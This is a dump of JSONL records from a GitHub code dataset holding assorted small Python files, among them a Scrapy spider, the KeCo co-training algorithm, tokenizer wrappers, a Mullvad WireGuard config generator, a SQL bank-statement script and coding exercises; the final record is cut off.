response.xpath(food_category_xpath).extract_first()\n published = response.meta.get('published')\n\n fdcId = self.getActualData(fdcId)\n foodCode = self.getActualData(foodCode)\n foodCategory = self.getActualData(foodCategory)\n published = self.getActualData(published)\n\n yield {\n 'Description': description,\n 'Data-Type': dataType,\n 'FDC-ID': fdcId,\n 'Food-Code': foodCode,\n 'Food-Category': foodCategory,\n 'Published': published\n }\n","repo_name":"shuvabiswas12/Ajax-Based-Website-Crawling-using-Scrapy-and-Splash","sub_path":"scrapy_project/spiders/spider_script.py","file_name":"spider_script.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6196790072","text":"\n# Python script to return a value True if the input string is a Palindrome and else it will return False\n# The script is case insensitive and ignore any non-alphanumeric characters\n\nimport sys\n\ninput_str = sys.argv[1]\n\ndef isPalindrome(input_str):\n\n try:\n \n result_str = \"\".join(char.lower() for char in input_str if char.isalnum())\n\n return result_str == result_str[::-1]\n\n except:\n\n print('An error occured')\n\ncheck_palindrome = isPalindrome(input_str)\n\nprint('The input string \"' + input_str + '\" is a palindrome: ' + str(check_palindrome))\n","repo_name":"gfttraining/tasks","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2687461801","text":"'''\nDescription:\n Contains the KeCo algorithm implementation\n\nTested in python 2.7.9, with the following list of installed python packages and versions:\n numpy==1.9.2, scikit-learn==0.16.1, scipy==0.15.1\n\n@authors: Laurens van de Wiel, Evgeni Levin\n'''\n\nimport numpy as np\n\ndef training(X, Y, V, order_of_samples, kernel, kernel_parameter, _lambda):\n \"\"\"Simulates the training of the KeCo algorithm\n X : training set containing the examples\n Y : training set labels (for unlabelled 0, labelled is +1 or -1)\n V : number of views\n order_of_samples : array with indices (to X and Y) representing the order of learning from the dataset\n kernel : kernel method that is to be used\n kernel_parameter : value of c (constant) for linear kernel, sigma for gaussian kernel, gamma for rbf_kernel\n _lambda : the regularization parameter\"\"\"\n \n # initialize alphas and predictions as a dictionary, with keys representing the views\n alphas = {}\n predictions = {}\n for n in range(V):\n # values for alphas and predictions are a dictionary, with keys representing the sample_index\n alphas[n] = {}\n predictions[n] = {}\n \n t = 0\n for i in order_of_samples: # retrieve the index of the sample that is used for current iteration\n t += 1\n # train a single iteration\n train_iteration(X, Y, V, predictions, alphas, i, t, kernel, kernel_parameter, _lambda)\n \n return alphas, predictions\n\ndef train_iteration(X, Y, V, predictions, alphas, i, t, kernel, kernel_parameter, _lambda):\n \"\"\"Simulates a single training iteration for the KeCo algorithm\n X : training set containing the examples\n Y : training set labels (for unlabelled 0, labelled is +1 or -1)\n V : number of views\n predictions : predictions made so far (optimization, so predictions do not need to be recalculated each iteration)\n alphas : the alpha vectors (sparse vector representing weight per sample)\n i : index for the current sample that is to be learned from\n t : number of the current iteration, with 1<= t <= T\n kernel : kernel method that is to be used\n kernel_parameter : value of c (constant) for linear kernel, sigma for gaussian kernel, gamma for rbf_kernel\n _lambda : the regularization parameter\"\"\"\n \n # retrieve the predictions for sample i\n for n in range(V):\n if not predictions[n].has_key(i):\n predictions[n][i] = 0.0\n \n predictions[n][i] = coagreement_prediction_for_view_n(X[n][i], X, Y, V, n, t, predictions, alphas, kernel, kernel_parameter, _lambda)\n \n \n for n in range(V):\n # compute loss\n z = z_j(Y, V, i, n, predictions)*predictions[n][i]\n if np.maximum(0, 1.-z) > 0: \n # loss within threshold, increment alpha weighth\n if not(alphas[n].has_key(i)):\n alphas[n][i] = 0.0 # ensure we are not receiving key not found error\n alphas[n][i] += 1.0\n \n\ndef coagreement_prediction_for_view_n(x_i, X, Y, V, n, t, predictions, alphas, kernel, kernel_parameter, _lambda):\n \"\"\"Performs a single prediction for a sample x_i for the view n\n x_i : the sample, whose label is to be predicted\n X : training set containing the examples\n Y : training set labels (for unlabelled 0, labelled is +1 or -1)\n V : number of views\n n : the index of the view this prediction is for\n t : number of the current iteration, with 1<= t <= T\n predictions : predictions made so far (optimization, so predictions do not need to be recalculated each iteration)\n alphas : the alpha vectors (sparse vector representing weight per sample)\n kernel : kernel method that is to be used\n kernel_parameter : value of c (constant) for linear kernel, sigma for gaussian kernel, gamma for rbf_kernel\n _lambda : the regularization parameter\"\"\"\n \n # initialize the predition as 0\n y_pred_i =0.\n \n # iterate over the alphas and form predictions\n for j in alphas[n].keys():\n if kernel_parameter is None:\n y_pred_i += alphas[n][j]*z_j(Y, V, j, n, predictions)*(kernel(x_i, X[n][j])[0][0])\n else:\n y_pred_i += alphas[n][j]*z_j(Y, V, j, n, predictions)*(kernel(x_i, X[n][j], kernel_parameter)[0][0])\n \n # Apply the regularization\n y_pred_i /= (_lambda * t)\n y_pred_i = y_pred_i\n \n # return the prediction\n return y_pred_i\n\n\ndef z_j(Y, V, j, n, predictions):\n \"\"\" retrieve_label_j_for_view_n\n Returns the label for labelled examples and the signed\n co-agreement for unlabelled examples.\"\"\"\n if Y[j] == 0.:\n return c_j(n, j, V, predictions)\n else:\n return Y[j]\n \n\ndef c_j(n, j, V, predictions):\n \"\"\"Perform the coagreement for view n\n Co-agreement represents the agreement between the\n different views in order to label an example.\"\"\"\n # ensure we have at least multiple views\n assert V >= 2\n \n c = 0.0\n for v in range(V):\n if v != n:\n c += predictions[v][j]\n c = np.sign(c)\n \n return c","repo_name":"laurensvdwiel/KeCo","sub_path":"src/KeCo.py","file_name":"KeCo.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31634947312","text":"# -*- coding:utf-8 -*-\n\nfrom math import radians, cos, sin, asin, sqrt, ceil\nimport os\n\nimport folium\nimport networkx as nx\nimport numpy as np\nimport pyproj\n\n\nfrom MRD.mrd_package.mrd.Data import Data\n# python -m pip install pyproj-1.9.5.1-cp37-cp37m-win_amd64.whl\n\n\n# 球面三角形による二点間の距離を計算\ndef haversine(lon1, lat1, lon2, lat2):\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n km = 6371* c # 地球の半径 6371km\n return km\n\n\nif __name__ == \"__main__\":\n\n center = 35.440374, 139.4866845\n distance = 10.0 # km\n\n data_dir = os.path.normpath(r\"C:\\Users\\hiroki\\PycharmProjects\\mrd\\MRD\\data\")\n d = Data()\n d.set_area(center, distance)\n d.set_path(data_dir)\n d.load()\n\n # 有向グラフ作成\n G = nx.DiGraph()\n\n # ノードを追加\n for node in d.road.all_node.keys():\n G.add_node(node)\n\n # エッジを追加\n piece_length = []\n for k, v, in d.road.all_way.items():\n for i in range(len(v.link)):\n if i == len(v.link) - 1:\n break\n lat_1, lon_1 = v.link[i]\n lat_2, lon_2 = v.link[i+1]\n dist = haversine(lon_1, lat_1, lon_2, lat_2)\n piece_length.append(dist)\n\n # 一方通行規制 正方向のみ\n if v.link_kisei in (4, 6):\n G.add_edge(k[0], k[1], weight=v.link_length, link=v.link, piece_length=piece_length)\n # 一方通行規制 逆方向のみ\n elif v.link_kisei in (5, 7):\n G.add_edge(k[1], k[0], weight=v.link_length, link=v.link[::-1], piece_length=piece_length[::-1])\n # 規制なし 双方向\n else:\n G.add_edge(k[0], k[1], weight=v.link_length, link=v.link, piece_length=piece_length)\n G.add_edge(k[1], k[0], weight=v.link_length, link=v.link[::-1], piece_length=piece_length[::-1])\n\n print(nx.info(G))\n nx.write_gpickle(G, 'yamato.pickle')\n\n# # 地図\n# map_ = folium.Map(location=[center[0], center[1]], zoom_start=18, control_scale=True, prefer_canvas=True)\n# for k, v in d.road.all_way.items():\n# reverse = False\n# if v.link_kisei in [4,5,6,7,8]:\n# link_length = \"length: {}m\".format(str(v.link_length))\n# if v.link_kisei in [5, 7]:\n# reverse = True\n# arrows = get_arrows(locations=v.link, reverse=reverse)\n# for arrow in arrows:\n# arrow.add_to(map_)\n# folium.PolyLine(locations=v.link, tooltip=link_length, color=\"red\", weight=\"4.5\", opacity=0.6).add_to(map_)\n#\n# map_.save('my_map.html')\n","repo_name":"hirosait/networkx","sub_path":"networkx_loader.py","file_name":"networkx_loader.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72911252946","text":"import sys\nfrom PyQt5 import QtWidgets\n\ndef window():\n app = QtWidgets.QApplication(sys.argv) # create app object\n\n w = QtWidgets.QWidget() # create window and set title\n w.setWindowTitle('Learning PyQt5')\n\n L1 = QtWidgets.QLabel(w) # add label to the window\n L1.setText('Hello World') # set text to the label\n L1.move(120, 60) # move label\n\n w.setGeometry(500, 150, 300, 200) # set window geomatry\n w.show()\n sys.exit(app.exec_())\n\nwindow()\n","repo_name":"farazahmediu01/The-Python-Workbook-","sub_path":"Pyqt/Pyqt_stuff/pyqt_experiment/pyqt5 lesson 2 label.py","file_name":"pyqt5 lesson 2 label.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35569416634","text":"from transformers import GPT2Tokenizer as GPT2Tok\nfrom transformers import BertTokenizer as BertTok\nimport sentencepiece as spm\n\nclass Capita:\n def forward(self, text):\n # words = nltk.tokenize.word_tokenize(text)\n words = text.split(\" \")\n final_words = []\n for word in words:\n if not word.isalpha():\n final_words.append(word.lower())\n else:\n if word.islower():\n pass\n elif word.isupper():\n final_words.append(\"⇧\")\n elif word[0].isupper() and word[1:].islower():\n final_words.append(\"↑\")\n else:\n final_words.append(\"↑\")\n final_words.append(word.lower())\n return \" \".join(final_words)\n\n def backward(self, text):\n words = text.split(\" \")\n final_words = []\n all_caps = False\n capitalized = False\n for w in words:\n if w == \"⇧\":\n all_caps = True\n elif w == \"↑\":\n capitalized = True\n else:\n final_word = w\n if all_caps:\n final_word = final_word.upper()\n elif capitalized:\n if len(final_word) <= 1:\n final_word = final_word.upper()\n else:\n final_word = final_word[0].upper()+final_word[1:]\n final_words.append(final_word)\n all_caps = False\n capitalized = False\n return \" \".join(final_words)\n\nclass BPETokenizer:\n def __init__(self, bpe_model, use_capita=True):\n self.sp = spm.SentencePieceProcessor()\n self.sp.Load(bpe_model)\n self.use_capita = use_capita\n\n self.pad_tok, self.start_tok, self.end_tok = \"\", \"\", \"\"\n self.pad_id, self.start_id, self.end_id = tuple(self.sp.piece_to_id(p) for p in [self.pad_tok, self.start_tok, self.end_tok])\n\n self.vocab_size = self.sp.get_piece_size()\n\n if self.use_capita:\n self.cpt = Capita()\n\n def tokenize(self, text):\n if len(text) == 0:\n return []\n if text[:len(self.start_tok)] == self.start_tok and text[len(self.start_tok)] != \" \":\n text = text.replace(self.start_tok, self.start_tok+\" \")\n\n if self.use_capita:\n text = self.cpt.forward(text)\n tokens = self.sp.encode_as_pieces(text)\n tokens = [w for i, w in enumerate(tokens) if (i < (len(tokens)-1) and tokens[i+1] not in [\"⇧\", \"↑\"]) or i==(len(tokens)-1)]\n if tokens[0] == \"▁\":\n tokens = tokens[1:]\n return tokens\n\n def encode(self, text):\n tokens = self.tokenize(text)\n token_ids = [self.sp.piece_to_id(w) for w in tokens]\n return token_ids\n\n def decode(self, token_ids):\n text = self.sp.decode_ids(token_ids).replace(\"⇧\", \" ⇧\").replace(\"↑\", \" ↑\")\n if self.use_capita:\n text = self.cpt.backward(text)\n text = text.replace(self.start_tok+\" \", self.start_tok)\n return text\n\nclass BERTCacheTokenizer:\n def __init__(self):\n self.cache = {}\n self.cache_keys = []\n self.tokenizer = BertTok.from_pretrained(\"bert-base-uncased\")\n # self.tokenizer.max_len = 10000 # This was removed in later transformer tokenizers\n\n def encode(self, text):\n if text in self.cache:\n return self.cache[text]\n\n output = self.tokenizer.encode(text)\n\n if len(self.cache) > 1000:\n del self.cache[self.cache_keys.pop(0)]\n self.cache[text] = output\n self.cache_keys.append(text)\n return output\n\nclass GPT2Tokenizer:\n def __init__(self):\n self.tokenizer = GPT2Tok.from_pretrained(\"gpt2\")\n # self.tokenizer.max_len = 10000\n\n self.pad_tok, self.start_tok, self.end_tok = \"\", \" ST\", \" END\"\n\n self.pad_id = 0\n self.start_id = self.tokenizer.encode(self.start_tok)[0]\n self.end_id = self.tokenizer.encode(self.end_tok)[0]\n self.vocab_size = self.tokenizer.vocab_size\n\n def tokenize(self, text):\n return self.tokenizer.tokenize(text)\n\n def encode(self, text):\n return self.tokenizer.encode(text)\n\n def decode(self, token_ids):\n return self.tokenizer.decode(token_ids)\n","repo_name":"CannyLab/summary_loop","sub_path":"utils_tokenizer.py","file_name":"utils_tokenizer.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"48"} +{"seq_id":"39989398674","text":"file_input = open('./2020/day12/input.txt').read().strip().split('\\n')\n\n# print(file_input)\nfacing = 90\nx = 0\ny = 0\n\nfor inp in file_input:\n action = inp[0:1]\n value = int(inp[1:])\n\n # print(action, value)\n\n if (action == 'R' or action == 'L'):\n if action == \"R\":\n facing += value\n else:\n facing -= value\n if facing < 0:\n facing = 360 - (-facing)\n facing %= 360\n\n if action == 'F':\n if facing == 0:\n y = y + value\n elif facing == 90:\n x = x + value\n elif facing == 180:\n y = y - value\n else:\n x = x - value\n else:\n if action == 'N':\n y = y + value\n elif action == \"S\":\n y = y - value\n elif action == \"W\":\n x = x - value\n elif action == \"E\":\n x = x + value\n\n\nresult = abs(x) + abs(y)\n\nprint(result)\n","repo_name":"reviakin/adventofcode","sub_path":"2020/day12/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13410256344","text":"from collections import defaultdict\nfrom pprint import pprint\nimport re\nimport pickle\nimport operator\nfrom itertools import permutations\nfrom timeit import timeit\n\n\nfrom utils import *\n\ngenome = \"CACAGTAGGCGCCGGCACACACAGCCCCGGGCCCCGGGCCGCCCCGGGCCGGCGGCCGCCGGCGCCGGCACACCGGCACAGCCGTACCGGCACAGTAGTACCGGCCGGCCGGCACACCGGCACACCGGGTACACACCGGGGCGCACACACAGGCGGGCGCCGGGCCCCGGGCCGTACCGGGCCGCCGGCGGCCCACAGGCGCCGGCACAGTACCGGCACACACAGTAGCCCACACACAGGCGGGCGGTAGCCGGCGCACACACACACAGTAGGCGCACAGCCGCCCACACACACCGGCCGGCCGGCACAGGCGGGCGGGCGCACACACACCGGCACAGTAGTAGGCGGCCGGCGCACAGCC\"\nk = 10\nd = 2\n\ndef main():\n kmers = find_kmers(k, genome)\n counts = defaultdict(int)\n num_kmers = len(genome) - k + 1\n\n with progress_bar(num_kmers, \"Searching\") as progress:\n\n for index in range(num_kmers):\n word = genome[index:index + k]\n progress.update(index)\n\n permuted_strings = mutations(word, d)\n\n for permutation in permuted_strings:\n counts[permutation] += 1\n\n sorted_kmers = sorted(counts.iteritems(), key=lambda x: x[1])\n pprint(sorted_kmers[-10:])\n\ndef old_algorithm():\n kmers = find_kmers(k, genome)\n counts = defaultdict(int)\n num_kmers = len(kmers)\n\n\n with progress_bar(num_kmers, \"Searching\") as progress:\n for count, search_string in enumerate(kmers.keys()):\n progress.update(count)\n\n permuted_strings = mutations(search_string, d)\n # permuted_strings = permutations(search_string)\n # num_permutations = len(permuted_strings)\n # print(num_permutations)\n\n for pcount, permutation in enumerate(permuted_strings):\n # if pcount % 1000 == 0:\n # print(\"{:.2f}\".format(pcount/float(num_permutations)*100))\n if permutation not in counts:\n # print(permutation)\n\n for index in range(len(genome) - k + 1):\n word = genome[index:index + k]\n miss_count = 0\n for x, letter in enumerate(word):\n if letter != permutation[x]:\n miss_count += 1\n if miss_count > d:\n break\n\n if miss_count <= d:\n counts[permutation] += 1\n\n\n sorted_kmers = sorted(counts.iteritems(), key=operator.itemgetter(1))\n pprint(sorted_kmers[-10:])\n\n\nif __name__ == '__main__':\n print(\"First: {:.2f} seconds\".format(timeit(main, number=1)))\n print(\"Second: {:.2f} seconds\".format(timeit(old_algorithm, number=1)))\n","repo_name":"jpinsonault/bioinformatics_challenges","sub_path":"problem7.py","file_name":"problem7.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20956448851","text":"RANDOM_STATE = 42\n\nDATA_TEST_SIZE = .3\nDATA_N = 10_000\n\nY_TRAIN = './train/'\nY_TRAIN_FULL = Y_TRAIN + 'y.pckl'\nX_TRAIN = './train/'\nX_TRAIN_FULL = X_TRAIN + 'x.pckl'\nY_TEST = './test/'\nY_TEST_FULL = Y_TEST + 'y.pckl'\nX_TEST = './test/'\nX_TEST_FULL = X_TEST + 'x.pckl'\n\nDATA_PATH = './data_default/' + 'house-pricing.csv'\n\nMODEL = './model/'\nMODEL_FULL = MODEL + 'model.pckl'\n","repo_name":"6boyz/ml-ops","sub_path":"consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24794726543","text":"'''\r\nExample module for getting input from a Database table and Updating data in a target table.\r\nUsing pyodbc library for interfacing with SQL Server Database.\r\n'''\r\nimport pyodbc\r\ntry:\r\n conn=pyodbc.connect(\"Driver={SQL Server};\" \"Server=localhost,53551;\" \"Database=PriyaDB;\" \"Trusted-connection = yes;\")\r\n cursor=conn.cursor()\r\n conn1=pyodbc.connect(\"Driver={SQL Server};\" \"Server=localhost,53551;\" \"Database=PriyaDB;\" \"Trusted-connection = yes;\")\r\n cursor1=conn1.cursor()\r\n cursor.execute(\"select c.cust_id,c.cust_name,a.acct_id,a.balance from cust_info c inner join acct_info a on c.cust_id = a.cust_id \")\r\n row=cursor.fetchone()\r\n bank={}\r\n while row:\r\n bank_dict={}\r\n bank_dict[\"cust_name\"]=row[1]\r\n bank_dict[\"balance\"] = int(row[3])\r\n if row[0] in bank:\r\n v=bank[row[0]]\r\n v[\"balance\"]= v[\"balance\"]+int(row[3])\r\n\r\n else:\r\n bank[row[0]]=bank_dict\r\n row=cursor.fetchone()\r\n print(bank)\r\n for key, value in bank.items():\r\n print(key, value)\r\n insert_str = '''insert into statement1_info values({cust_id},'{cust_name}',{balance})'''\r\n sql_command = insert_str.format(cust_id=key, cust_name=value[\"cust_name\"], balance=value[\"balance\"])\r\n cursor1.execute(sql_command)\r\nexcept Exception as e:\r\n print(e)\r\n\r\nfinally:\r\n conn1.commit()\r\n conn.close()\r\n conn1.close()","repo_name":"padmapriyacoll/code-examples","sub_path":"python/BankAcccount.py","file_name":"BankAcccount.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34797370491","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api, _\n\n\nclass PaymentOrderCreate(models.TransientModel):\n _inherit = 'payment.order.create'\n\n @api.multi\n def _prepare_payment_line(self, payment, line):\n \"\"\"This function is designed to be inherited\n The resulting dict is passed to the create method of payment.line\"\"\"\n self.ensure_one()\n _today = fields.Date.context_today(self)\n date_to_pay = False # no payment date => immediate payment\n if payment.date_prefered == 'due':\n # -- account_banking\n # date_to_pay = line.date_maturity\n date_to_pay = (\n line.date_maturity\n if line.date_maturity and line.date_maturity > _today\n else False)\n # -- end account banking\n elif payment.date_prefered == 'fixed':\n # -- account_banking\n # date_to_pay = payment.date_scheduled\n date_to_pay = (\n payment.date_scheduled\n if payment.date_scheduled and payment.date_scheduled > _today\n else False)\n # -- end account banking\n # -- account_banking\n state = 'structured'\n communication = line.ref or '-'\n if line.invoice:\n if line.invoice.reference_type == 'structured':\n state = 'structured'\n # Fallback to invoice number to keep previous behaviour\n communication = line.invoice.reference or line.invoice.number\n else:\n if line.invoice.type in ('in_invoice', 'in_refund'):\n communication = (\n line.invoice.reference or\n line.invoice.supplier_invoice_number or line.ref)\n else:\n # Make sure that the communication includes the\n # customer invoice number (in the case of debit order)\n communication = line.invoice.number\n # support debit orders when enabled\n if line.debit > 0:\n amount_currency = line.amount_residual_currency * -1\n else:\n amount_currency = line.amount_residual_currency\n if payment.payment_order_type == 'debit':\n amount_currency *= -1\n line2bank = line.line2bank(payment.mode.id)\n # -- end account banking\n res = {'move_line_id': line.id,\n 'amount_currency': amount_currency,\n 'bank_id': line2bank.get(line.id),\n 'order_id': payment.id,\n 'partner_id': line.partner_id and line.partner_id.id or False,\n # account banking\n 'communication': communication,\n 'state': state,\n # end account banking\n 'date': date_to_pay,\n 'currency': (line.invoice and line.invoice.currency_id.id or\n line.journal_id.currency.id or\n line.journal_id.company_id.currency_id.id)}\n return res\n\n @api.multi\n def create_payment(self):\n \"\"\"This method is a slightly modified version of the existing method on\n this model in account_payment.\n - pass the payment mode to line2bank()\n - allow invoices to create influence on the payment process: not only\n 'Free' references are allowed, but others as well\n - check date_to_pay is not in the past.\n \"\"\"\n if not self.entries:\n return {'type': 'ir.actions.act_window_close'}\n context = self.env.context\n payment_line_obj = self.env['payment.line']\n payment = self.env['payment.order'].browse(context['active_id'])\n # Populate the current payment with new lines:\n for line in self.entries:\n vals = self._prepare_payment_line(payment, line)\n payment_line_obj.create(vals)\n # Force reload of payment order view as a workaround for lp:1155525\n return {'name': _('Payment Orders'),\n 'context': context,\n 'view_type': 'form',\n 'view_mode': 'form,tree',\n 'res_model': 'payment.order',\n 'res_id': context['active_id'],\n 'type': 'ir.actions.act_window'}\n","repo_name":"decodio/l10n_hr","sub_path":"l10n_hr_sepa/wizard/payment_order_create.py","file_name":"payment_order_create.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"69815145426","text":"def countTriplets(arr,n,sum):\n \n # Sort input array\n arr.sort()\n \n # Initialize result\n ans = 0\n \n # Every iteration of loop counts triplet with\n # first element as arr[i].\n for i in range(0,n-2):\n \n # Initialize other two elements as corner elements\n # of subarray arr[j+1..k]\n j = i + 1\n k = n-1\n \n # Use Meet in the Middle concept\n while(j < k):\n \n # If sum of current triplet is more or equal,\n # move right corner to look for smaller values\n if (arr[i]+arr[j]+arr[k] >=sum):\n k = k-1\n \n # Else move left corner\n else:\n \n # This is important. For current i and j, there\n # can be total k-j third elements.\n ans += (k - j)\n j = j+1\n \n return ans\n \n# Driver program\nif __name__=='__main__':\n arr = [5, 1, 3, 4, 7]\n n = len(arr)\n sum = 12\n print(countTriplets(arr, n, sum))\n","repo_name":"DDR7707/Final-450-with-Python","sub_path":"Searching and Sorting/113.Count Triplets sum less than given Number.py","file_name":"113.Count Triplets sum less than given Number.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"40655434461","text":"import labrad\nimport time\n\ndef square_numbers(cxn, numbers):\n ss = cxn.squaring_server\n t_start = time.time()\n print(\"Starting synchronous requests...\")\n for n in numbers:\n square = ss.square(n)\n print(\"%f**2 = %f\"%(n, square))\n t_total = time.time() - t_start\n print(\"Finished %d requests after %f seconds.\"%(len(numbers), t_total))\n","repo_name":"joshmutus/pylabrad-wiki","sub_path":"synchronousclient_1.py","file_name":"synchronousclient_1.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16979087422","text":"#!/usr/bin/python\n\nimport json\n#import urllib.request\nimport urllib2\nimport random\nimport sys\nimport os.path\n\nurl=\"https://api.mullvad.net/www/relays/all/\"\ndir=\"/etc/wireguard\"\n\n#servers=json.load(urllib.request.urlopen(url))\nservers=json.load(urllib2.urlopen(url))\n#servers=json.load(open('api','r'))\n\nservers=[x for x in servers if x['type']=='wireguard']\nif len(sys.argv)>1:\n\tservers=[x for x in servers if x['country_code']==sys.argv[1]]\nif len(sys.argv)>2:\n\tservers=[x for x in servers if x['city_code']==sys.argv[2]]\n\nowned=[x for x in servers if x['owned']==1]\nif len(owned)>0: servers=owned\n\nserver=servers[random.randint(0,len(servers)-1)]\n\nprint (json.dumps(server, indent=4))\n\nhostname=server[\"hostname\"]\nservername=\"mullvad-\"+hostname[:hostname.index('-')]\n\nwith open(os.path.join(dir,'template'),'r') as file:\n\ttemplate=file.read()\n\n#with open('outfile','w') as file:\nwith open(os.path.join(dir,servername+\".conf\"),'w') as file:\n\tfile.write(template)\n\tfile.write(\"PublicKey = \"+server[\"pubkey\"]+\"\\n\")\n\tfile.write(\"Endpoint = \"+server[\"ipv4_addr_in\"]+\":51820\"+\"\\n\")\n\nos.chmod(os.path.join(dir,servername+\".conf\"),0o600);\n","repo_name":"m0gjr/bashcrap","sub_path":"bin/mullvad.py","file_name":"mullvad.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34772525503","text":"import os\nimport sys\nfrom distutils.core import setup, Extension\n\ndkp = os.getenv(\"DEVKITPRO\")\nif dkp is None:\n print(\"Please set DEVKITPRO in your environment. export DEVKITPRO=/devkitpro\")\n sys.exit(1)\n\nlibnx = f\"{dkp}/libnx\"\n\nnx_ext = Extension(\"_nx\",\n include_dirs = [f\"{libnx}/include\"],\n #define_macros = [(\"__SWITCH__\",)],\n #libraries = [\"nx\"],\n #library_dirs = [f\"{libnx}/lib\"],\n sources = [\"Modules/_nx.c\"],\n)\n\nsetup(\n name = \"_nx\",\n ext_modules = [nx_ext],\n)","repo_name":"friedkeenan/nxpy","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25871498431","text":"import heapq\nimport sys\ninput = sys.stdin.readline\ndef find_parents(X):\n if make_set[X] ==X:\n return X\n else:\n make_set[X] = find_parents(make_set[X])\n return make_set[X]\n\n\ndef union(a,b):\n X = find_parents(a)\n Y = find_parents(b)\n if X == Y:\n return False\n if rank[X]< rank[Y]:\n X,Y = Y,X\n make_set[Y] = X\n if rank[X] == rank[Y]:\n rank[X] += 1\n return True\n\n\nP,W = map(int,input().split())\n\nc,v = map(int,input().split())\n\nweight_list = [list(map(int,input().split())) for _ in range(W)]\nmake_set = [i for i in range(P)]\nweight_list.sort(key=lambda x : x[2])\nrank = [1 for _ in range(P)]\nresult = float('inf')\nwhile find_parents(c) != find_parents(v):\n node_a,node_b,pay = weight_list.pop()\n if union(node_a,node_b):\n result = pay\n\n\nprint(result)","repo_name":"gkgg123/TIL_new","sub_path":"알고리즘/백준/11085_군사_이동_version1.py","file_name":"11085_군사_이동_version1.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8456559541","text":"from stopwatch import Stopwatch\n# no matter how large n gets the runtime of our algorithm is constant.\n\n\ndef constant_run_time(N):\n total_sum = 0\n for i in range(0, 50):\n # Add all numbers from 0 to 50\n total_sum += i\n # print(total_sum)\n return total_sum\n\n\nif __name__ == \"__main__\":\n input_sizes = [100, 200, 400, 800, 1600, 3200, 6400]\n for input_size in input_sizes:\n # This times the function\n timer = Stopwatch()\n constant_run_time(input_size)\n # what's odd with this output is the run times actually get faster, or\n # go down but they aren't increasing so that's good?\n print(input_size, timer.elapsed_time())\n","repo_name":"dky/cb","sub_path":"legacy/fundamentals/runtime-space-complexity/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"68270605","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^ta_courses', views.course, name='ta_courses'),\n url(r'^ta_hw', views.hw, name='ta_hw'),\n url(r'^new_hw', views.new_hw, name='new_hw'),\n url(r'^mark_hw', views.mark_hw, name='mark_hw'),\n url(r'^ta_forum', views.ta_forum, name='ta_forum'),\n url(r'^ta_resource_comment', views.ta_resource_comment, name='ta_resource_comment'),\n url(r'^message', views.message, name='ta_message'),\n]\n","repo_name":"wsyzxxxx/Teaching_management","sub_path":"ta/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19185242565","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\n\nNUM_STEP = 100\nBATCH_SIZE = 32\nTRAIN_SIZE = NUM_STEP * BATCH_SIZE\nCYCLES = 100\n\nDISCOUNT = 0.9\n\nmodelName = 'noRegCNNSLT.h5'\n\n\ndef moveWithoutSpawn(board, direction):\n board_to_left = np.rot90(board, -direction)\n for row in range(4):\n core = _merge(board_to_left[row])\n board_to_left[row, :len(core)] = core\n board_to_left[row, len(core):] = 0\n\n # rotation to the original\n return np.rot90(board_to_left, direction)\n\n\ndef _merge(row):\n '''merge the row, there may be some improvement'''\n non_zero = row[row != 0] # remove zeros\n core = [None]\n for elem in non_zero:\n if core[-1] is None:\n core[-1] = elem\n elif core[-1] == elem:\n core[-1] = 2 * elem\n core.append(None)\n else:\n core.append(elem)\n if core[-1] is None:\n core.pop()\n return core\n\n\nif __name__ == \"__main__\":\n\n model = keras.models.load_model(modelName)\n\n states = np.load('EpisodeLogs/sAug.npy')\n reward = 